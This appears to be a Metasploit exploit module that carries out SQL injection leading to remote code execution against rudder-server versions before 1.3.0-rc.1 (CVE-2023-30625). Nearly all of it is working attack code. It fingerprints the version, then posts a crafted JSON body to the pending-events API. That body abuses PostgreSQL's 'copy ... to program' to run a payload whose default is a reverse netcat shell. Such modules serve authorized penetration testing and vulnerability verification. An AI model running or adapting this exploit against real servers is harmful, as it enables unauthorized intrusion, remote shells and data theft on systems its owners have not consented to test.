Rudder Server SQL Injection / Remote Code Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FileDropper  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Rudder Server SQLI Remote Code Execution',        'Description' => %q{          This Metasploit module exploits a SQL injection vulnerability in          RudderStack's rudder-server, an open source Customer Data Platform (CDP).          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.          By exploiting this flaw, an attacker can execute arbitrary SQL commands,          which may lead to Remote Code Execution (RCE) due to the `rudder` role          in PostgreSQL having superuser permissions by default.        },        'License' => MSF_LICENSE,        'Author' => [          'Ege Balcı <[email protected]>' # msf module        ],        'References' => [          ['CVE', '2023-30625'],          ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'],          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'],        ],        'DefaultOptions' => {          'SSL' => false,          'WfsDelay' => 5        },        'Platform' => [ 'unix', 'linux' ],        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],        'Targets' => [          [            'Unix Command',            {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ],          # Due to the insufficient build instructions for Windows platforms, no testing were done on this platform.          # As a result, the target is disabled in this exploit module.          # [          #   'Windows Command',          #   {          #     'Platform' => 'win',          #     'Arch' => ARCH_CMD,          #     'Type' => :win_cmd,          #     'DefaultOptions' => {          #       'PAYLOAD' => 'cmd/windows/powershell_reverse_netcat'          #     }          #   }          # ],        ],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2023-06-16',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']),      ]    )  end  def check    version = get_version    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'    if Rex::Version.new('1.3.0-rc.1') > Rex::Version.new(version.gsub('v', ''))      return Exploit::CheckCode::Appears("Rudder Version: #{version}")    end    Exploit::CheckCode::Safe  end  def get_version    return @get_version if @get_version    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'version')    )    if res && res.code == 200      @get_version = res.get_json_document['Version']      if @get_version.empty?        @get_version = 'Unknown'      end      @get_version    end  end  def exploit    print_status "Detected rudder version: #{get_version}"    # If not 'Auto' then use the selected version    case target['Type']    # when :win_cmd    #   shell = 'cmd.exe'    when :unix_cmd      shell = 'bash'    else      fail_with(Failure::BadConfig, 'Please select a valid target')    end    data = "{\"source_id\": \"#{Rex::Text.rand_text_alpha(4..8)}'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"    print_status 'Triggering RCE via crafted SQL query...'    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/v1/warehouse/pending-events'),      'ctype' => 'application/json',      'data' => data    })  endend